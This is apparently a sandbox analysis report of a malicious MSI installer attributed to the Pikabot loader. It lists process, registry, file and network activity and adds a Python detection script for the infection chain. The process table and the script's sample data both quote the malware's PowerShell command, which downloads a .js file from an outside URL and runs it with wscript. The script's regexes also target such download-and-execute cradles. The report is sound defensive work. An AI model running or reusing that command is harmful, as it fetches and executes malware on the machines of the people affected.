| Field | Value |
|---|---|
| File name: | 38MirrorsConnectionAgent.msi |
| Full analysis: | https://app.any.run/tasks/2882d6ad-bdec-4662-9dbb-30275989f854 |
| Verdict: | Malicious activity |
| Threats: | Pikabot is a trojan with a focus on loader capabilities; it is also used to execute commands on the infected system. Earlier versions relied on extensive code obfuscation to evade detection. After infection it collects system information and sends it to its command-and-control servers. |
| Analysis date: | January 31, 2024, 19:42:15 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-msi |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: MirrorsConnectionAgent, Author: admin, Keywords: Installer, Comments: This installer database contains the logic and data required to install MirrorsConnectionAgent., Template: Intel;1033, Revision Number: {18E2456B-A895-418C-B15E-3CA510EB5D94}, Create Time/Date: Fri Jan 19 13:14:34 2024, Last Saved Time/Date: Fri Jan 19 13:14:34 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2 |
| MD5: | 5E373E93963D811DDD4A5D4FB4BA0FE5 |
| SHA1: | F7E723A6CDB05382C4096F07E703648413BA6F6C |
| SHA256: | 6DF1CDA132D06E5CC00D6D8D88DFA8ED2DEA8C036225D505008CD842A4DE378C |
| SSDEEP: | 49152:BeCNMZwx2Sz5lb30T+ICrbjfKlBb7/nSej8ApoqNwDabaoFSCmNnPapAk:lNbxRz5FkJCrbjfGhN6xoFSNNipAk |
| Extension | Identified type |
|---|---|
| .msi | Microsoft Windows Installer (98.5) |
| .msi | Microsoft Installer (100) |
| Property | Value |
|---|---|
| CodePage: | Windows Latin 1 (Western European) |
| Title: | Installation Database |
| Subject: | MirrorsConnectionAgent |
| Author: | admin |
| Keywords: | Installer |
| Comments: | This installer database contains the logic and data required to install MirrorsConnectionAgent. |
| Template: | Intel;1033 |
| RevisionNumber: | {18E2456B-A895-418C-B15E-3CA510EB5D94} |
| CreateDate: | 2024:01:19 13:14:34 |
| ModifyDate: | 2024:01:19 13:14:34 |
| Pages: | 200 |
| Words: | 2 |
| Software: | Windows Installer XML Toolset (3.11.2.4516) |
| Security: | Read-only recommended |
| PID | Command line | Image path | Parent process | User | Integrity level | Exit code | Description (company, version) |
|---|---|---|---|---|---|---|---|
| 872 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | services.exe | SYSTEM | SYSTEM | 0 | Windows® installer (Microsoft Corporation, 5.0.19041.1 (WinBuild.160101.0800)) |
| 1376 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | svchost.exe | NETWORK SERVICE | SYSTEM | 0 | KMS Connection Broker (Microsoft Corporation, 10.0.19041.1202 (WinBuild.160101.0800)) |
| 1920 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | powershell.exe | admin | HIGH | 0 | Console Window Host (Microsoft Corporation, 10.0.19041.1 (WinBuild.160101.0800)) |
| 2196 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | NETWORK SERVICE | SYSTEM | 1 | Windows Activation Client (Microsoft Corporation, 10.0.19041.1 (WinBuild.160101.0800)) |
| 2580 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\Downloads\38MirrorsConnectionAgent.msi" | C:\Windows\System32\msiexec.exe | explorer.exe | admin | MEDIUM | 1602 | Windows® installer (Microsoft Corporation, 5.0.19041.1 (WinBuild.160101.0800)) |
| 2652 | rundll32.exe "C:\WINDOWS\Installer\MSID337.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_1037140 11 WixSharp!WixSharp.ManagedProjectActions.WixSharp_AfterInstall_Action | C:\Windows\SysWOW64\rundll32.exe | msiexec.exe | admin | HIGH | 0 | Windows host process (Rundll32) (Microsoft Corporation, 10.0.19041.746 (WinBuild.160101.0800)) |
| 3648 | C:\Windows\syswow64\MsiExec.exe -Embedding CD1B047BFDEDDFA3A26C23CC2FCFD8CC U | C:\Windows\SysWOW64\msiexec.exe | msiexec.exe | admin | MEDIUM | 0 | Windows® installer (Microsoft Corporation, 5.0.19041.1 (WinBuild.160101.0800)) |
| 3964 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | admin | MEDIUM | 0 | Windows Activation Client (Microsoft Corporation, 10.0.19041.1 (WinBuild.160101.0800)) |
| 5252 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | powershell.exe | admin | HIGH | 0 | Console Window Host (Microsoft Corporation, 10.0.19041.1 (WinBuild.160101.0800)) |
| 5272 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command IWR -UseBasicParsing -Uri 'https://www.fuchs.com.sd/media/media/js/wp-content.php' -OutFile $env:temp\upd579.js; wscript $env:temp\upd579.js | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | admin | HIGH | 0 | Windows PowerShell (Microsoft Corporation, 10.0.19041.1 (WinBuild.160101.0800)) |
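The process table shows the chain this report is about. explorer.exe launches msiexec.exe (PID 2580) on the downloaded MSI; its exit code 1602 is ERROR_INSTALL_USEREXIT, so the visible installer UI was cancelled, yet the package's WixSharp custom action still ran: an msiexec.exe spawned rundll32.exe (PID 2652, HIGH integrity) to load a C:\WINDOWS\Installer\*.tmp DLL through the WiX/DTF entry point zzzzInvokeManagedCustomActionOutOfProc, and the CLR usage log C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log in the files table (written by the .NET runtime) confirms that managed code executed inside rundll32.exe. A powershell.exe child (PID 5272, parent also powershell.exe) then fetches a .js into %TEMP% with Invoke-WebRequest and hands it to wscript. Two caveats when reading the rest of the report: the HTTP and connection tables contain only Microsoft CRL, update and telemetry traffic, so the request to www.fuchs.com.sd and any retrieval of upd579.js are not shown in this run; and the IDS alerts are attributed to a powershell.exe with PID 6184 that, like the parent of PID 5272, does not appear in the process table.

The following Python is an added example, not part of the ANY.RUN report and not vendor tooling: two detection checks run over process-creation events constructed from the rows above (the three malicious rows copy the table's command lines; the two benign control events, the ProcEvent field names and the rule names are assumptions).

```python
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    """Process-creation event (Sysmon Event ID 1 style). Field names are assumptions."""
    pid: int
    image: str           # full path of the created process
    command_line: str
    parent_image: str    # path or basename of the parent
    integrity: str = ""  # MEDIUM / HIGH / SYSTEM as shown in the sandbox table


@dataclass
class Finding:
    pid: int
    rule: str
    iocs: dict = field(default_factory=dict)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Patterns for the PowerShell "download to %TEMP% and run with a script host" stage.
DOWNLOAD_CMDLET = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod)\b", re.I)
URI_ARG = re.compile(r"-Uri\s+['\"]?(https?://[^'\"\s;]+)", re.I)
OUTFILE_ARG = re.compile(r"-OutFile\s+['\"]?([^'\"\s;]+)", re.I)
TEMP_PATH = re.compile(r"\$env:temp\\|\\AppData\\Local\\Temp\\", re.I)
SCRIPT_HOST = re.compile(r"\b(?:wscript|cscript|mshta)(?:\.exe)?\b", re.I)


def check_managed_custom_action(ev: ProcEvent):
    """rundll32.exe spawned by msiexec.exe to run a WiX/DTF managed custom action
    (zzzzInvokeManagedCustomActionOutOfProc) from a C:\\Windows\\Installer\\*.tmp DLL."""
    if _basename(ev.image) != "rundll32.exe" or _basename(ev.parent_image) != "msiexec.exe":
        return None
    cl = ev.command_line
    if "zzzzinvokemanagedcustomactionoutofproc" not in cl.lower():
        return None
    dll = re.search(r'"?([A-Za-z]:\\[^",]+\.tmp)"?', cl, re.I)
    # The managed entry point is the token of the form Assembly!Namespace.Class.Method.
    entry = next((tok for tok in cl.split() if "!" in tok), None)
    return Finding(ev.pid, "msi_managed_custom_action",
                   {"dll": dll.group(1) if dll else None,
                    "entry_point": entry,
                    "integrity": ev.integrity})


def check_powershell_download_execute(ev: ProcEvent):
    """powershell.exe downloading a file with Invoke-WebRequest -OutFile and
    invoking a script host on it in the same command."""
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    cl = ev.command_line
    if not (DOWNLOAD_CMDLET.search(cl) and OUTFILE_ARG.search(cl) and SCRIPT_HOST.search(cl)):
        return None
    uri = URI_ARG.search(cl)
    out = OUTFILE_ARG.search(cl)
    return Finding(ev.pid, "powershell_download_execute",
                   {"url": uri.group(1) if uri else None,
                    "dropped": out.group(1),
                    "to_temp": bool(TEMP_PATH.search(out.group(1))),
                    "nested_powershell": _basename(ev.parent_image) in ("powershell.exe", "pwsh.exe")})


RULES = (check_managed_custom_action, check_powershell_download_execute)


def scan(events):
    """Run every rule over every event; return the findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                findings.append(hit)
    return findings


# Constructed events: the first three copy rows from the process table above,
# the last two are constructed benign controls that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(2580, r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\Downloads\38MirrorsConnectionAgent.msi"',
              "explorer.exe", "MEDIUM"),
    ProcEvent(2652, r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\WINDOWS\Installer\MSID337.tmp",zzzzInvokeManagedCustomActionOutOfProc '
              r"SfxCA_1037140 11 WixSharp!WixSharp.ManagedProjectActions.WixSharp_AfterInstall_Action",
              "msiexec.exe", "HIGH"),
    ProcEvent(5272, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command IWR -UseBasicParsing '
              r"-Uri 'https://www.fuchs.com.sd/media/media/js/wp-content.php' -OutFile $env:temp\upd579.js; "
              r"wscript $env:temp\upd579.js",
              "powershell.exe", "HIGH"),
    ProcEvent(9001, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL", "explorer.exe", "MEDIUM"),
    ProcEvent(9002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Process", "explorer.exe", "MEDIUM"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.pid, f.rule, f.iocs)
```

Both checks key on the parent/child pair and the command line rather than on the file name, so they survive a renamed MSI; the extracted url and dropped values are the IOCs an analyst would pivot on, and nested_powershell records that the downloader was itself launched from PowerShell, as in this run.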
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 3648 | msiexec.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | 1 |
| 3648 | msiexec.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | 1 |
| 3648 | msiexec.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 1 |
| 3648 | msiexec.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 0 |
| 872 | msiexec.exe | delete key | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001_Classes\Local Settings\MuiCache\28\52C64B7E | (default) | |
| 872 | msiexec.exe | delete key | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001_Classes\Local Settings\MuiCache\28 | (default) | |
| 872 | msiexec.exe | delete value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts | C:\Config.Msi\fd1a1.rbs | 31085693 |
| 872 | msiexec.exe | delete value | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 | Sequence | 1 |
| 872 | msiexec.exe | delete value | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 | SessionHash | F210AC8E8BA196337BBA8408F13CFB7029921B8A55E4E1912E1B14AA2158D16C |
| 872 | msiexec.exe | delete value | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 | Owner | 680300004F08B29F7D54DA01 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\Microsoft.Deployment.WindowsInstaller.dll | executable | 82EB1CCF28F3AF897C2DB27282B41156 | CED6CAB3C04C08CE5705AF0B6986965DBDBFDA17CBD66C973BB371ED3B95F37A |
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\WixSharp.UI.dll | executable | A8D11EE5C3DCC54D8082FD2C087C7977 | C29D2AEB1DE17211ADB98A490051D83BFD05D10AF66094EF7159D0917BAD35CB |
| 2580 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\WixSharp.UI.CA.dll | executable | 4EC3B1DDA997B099CB2388536541B08A | 208D0DBC4DA92BC1FB1CA9E2020FF4A4DF3EDB595BA1D99AD55D429938485388 |
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\WixSharp.dll | executable | 02551708742C3E7BADEE72532C9484B7 | 0FC8EDC2B0BF3B92AB50C08429B03F7612FE1FE2E1216A4D9266F11058E3E95F |
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\EmbeddedUI.config | xml | C9C40AF1656F8531EAA647CACEB1E436 | 1A67F60962CA1CBF19873B62A8518EFE8C701A09CD609AF4C50ECC7F0B468BB8 |
| 5380 | rundll32.exe | C:\WINDOWS\Installer\MSID1FC.tmp-\WixSharp.dll | executable | 02551708742C3E7BADEE72532C9484B7 | 0FC8EDC2B0BF3B92AB50C08429B03F7612FE1FE2E1216A4D9266F11058E3E95F |
| 5380 | rundll32.exe | C:\WINDOWS\Installer\MSID1FC.tmp-\Microsoft.Deployment.WindowsInstaller.dll | executable | 1A5CAEA6734FDD07CAA514C3F3FB75DA | CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA |
| 872 | msiexec.exe | C:\WINDOWS\Installer\inprogressinstallinfo.ipi | binary | AD646D317A0CF303C1F2B79B00FC01DC | B1093BAB5C5D262E3FF0859730C8408C1115B22C88E91CB8056A3AFE7C12C0B8 |
| 5380 | rundll32.exe | C:\WINDOWS\Installer\MSID1FC.tmp-\ConsoleApp2.exe | executable | 29D6261E0AFDD28DE534140B864E7AA8 | BFAC55BBBC160926FB55AFF5FC7786E161E71480DF70220C1BD13D7F33EDE8CB |
| 5380 | rundll32.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log | binary | 2D3001B09823934D193B7D7C9403FF11 | 4B211ACD024231B35716567A9F08042915207EBE5A56A601B4B88072BAD93EB0 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 1612 | svchost.exe | GET | 200 | 23.216.77.42:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | binary | 1.11 Kb | unknown |
| 1092 | svchost.exe | POST | 302 | 23.35.234.120:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
| 1612 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | binary | 814 b | unknown |
| 2176 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | binary | 418 b | unknown |
| 2176 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | binary | 409 b | unknown |
| 6792 | svchost.exe | HEAD | 200 | 23.44.215.49:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1707187847&P2=404&P3=2&P4=RyrufO6I2HjV0Gx1McP3jRdu9T%2fsmJjBzWNafj6uVDiJ4Jhk1gQwuJ4Vzm8%2bdqpj0k%2bNgDri6CB4n7W1CdWqBg%3d%3d | unknown | — | — | unknown |
| 4956 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
| 1092 | svchost.exe | POST | 302 | 23.35.234.120:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
| 6792 | svchost.exe | GET | 206 | 23.44.215.49:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1707187847&P2=404&P3=2&P4=RyrufO6I2HjV0Gx1McP3jRdu9T%2fsmJjBzWNafj6uVDiJ4Jhk1gQwuJ4Vzm8%2bdqpj0k%2bNgDri6CB4n7W1CdWqBg%3d%3d | unknown | binary | 1.09 Kb | unknown |
| 6792 | svchost.exe | GET | 206 | 23.44.215.49:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1707187847&P2=404&P3=2&P4=RyrufO6I2HjV0Gx1McP3jRdu9T%2fsmJjBzWNafj6uVDiJ4Jhk1gQwuJ4Vzm8%2bdqpj0k%2bNgDri6CB4n7W1CdWqBg%3d%3d | unknown | binary | 9.62 Kb | unknown |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3720 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
| 6492 | msedge.exe | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
| 5612 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 1612 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 1612 | svchost.exe | 23.216.77.42:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
| 1612 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| 4956 | svchost.exe | 40.126.31.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 1092 | svchost.exe | 23.35.234.120:80 | go.microsoft.com | AKAMAI-AS | DE | unknown |
| 1092 | svchost.exe | 20.231.121.79:80 | dmd.metaservices.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
| 2176 | SIHClient.exe | 20.12.23.50:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
| Domain | IP | Reputation |
|---|---|---|
| config.edge.skype.com | | whitelisted |
| crl.microsoft.com | | whitelisted |
| www.microsoft.com | | whitelisted |
| login.live.com | | whitelisted |
| go.microsoft.com | | whitelisted |
| dmd.metaservices.microsoft.com | | whitelisted |
| slscr.update.microsoft.com | | whitelisted |
| fe3cr.delivery.mp.microsoft.com | | whitelisted |
| edge.microsoft.com | | whitelisted |
| msedge.b.tlu.dl.delivery.mp.microsoft.com | | whitelisted |
| PID | Process | Class | Message |
|---|---|---|---|
| 6184 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 15 |
| 6184 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |